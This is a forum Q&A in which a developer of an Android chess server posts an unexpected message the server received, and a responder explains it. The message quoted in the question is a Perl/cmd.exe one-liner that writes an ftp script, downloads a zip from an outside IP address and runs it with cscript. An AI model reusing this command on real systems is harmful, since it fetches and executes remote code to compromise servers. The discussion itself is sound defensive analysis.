Menu
I have a Chess App Online made in Android.
I monitor all messages the server receives after the client has called .accept() and I read the BufferedReader().
I recently got a very strange message from an unknown user, which doesn't match at all with the usual message format that I get.
This was what the server received:
?2 28 \perl.exe -esystem('cmd.exe /c echo bin>f&echo get azb.zip %temp%\\z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%\\z.zip 579562847 macu://58.238.143.25:88/h')
Does anyone have any idea of what is this? And if is dangerous, what can I do?
926
Indeed this seems like an attack (or an attempt). If I split the line up, I end with the following:
The "individual" tries to execute some code on your server. It first creates a file called f with the following content:
bin
get azb.zip %temp%\z.zip
bye
Then it runs the ftp command with that file as input, i.e. it connects to 112.213.127.52 and fetches the file azb.zip and stores it locally (on your server) as %temp%\z.zip
Finally it runs
cscript.exe /b /e:VBScript.Encode %temp%\z.zip 579562847 macu://58.238.143.25:88/h
The whole snippet is wrapped into a perl one-liner. Perl's system() function simply executes the external command given to it, in this case the cmd.exe. I think it's done because it is very unlikely that your server will run cmd.exe but it may run perl because perl is frequently used for server scripts (e.g. cgi scripts).
Good news is: This will work only if all of the following conditions are met:
perl.exe installedcmd.exe installedcscript.exe installed%temp% correctlyThis site says the address 58.238.143.25 is from South Korea and 112.213.127.52 is from Hong Kong.
I wouldn't care. This is an attack for Windows based servers. Is yours?
113
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
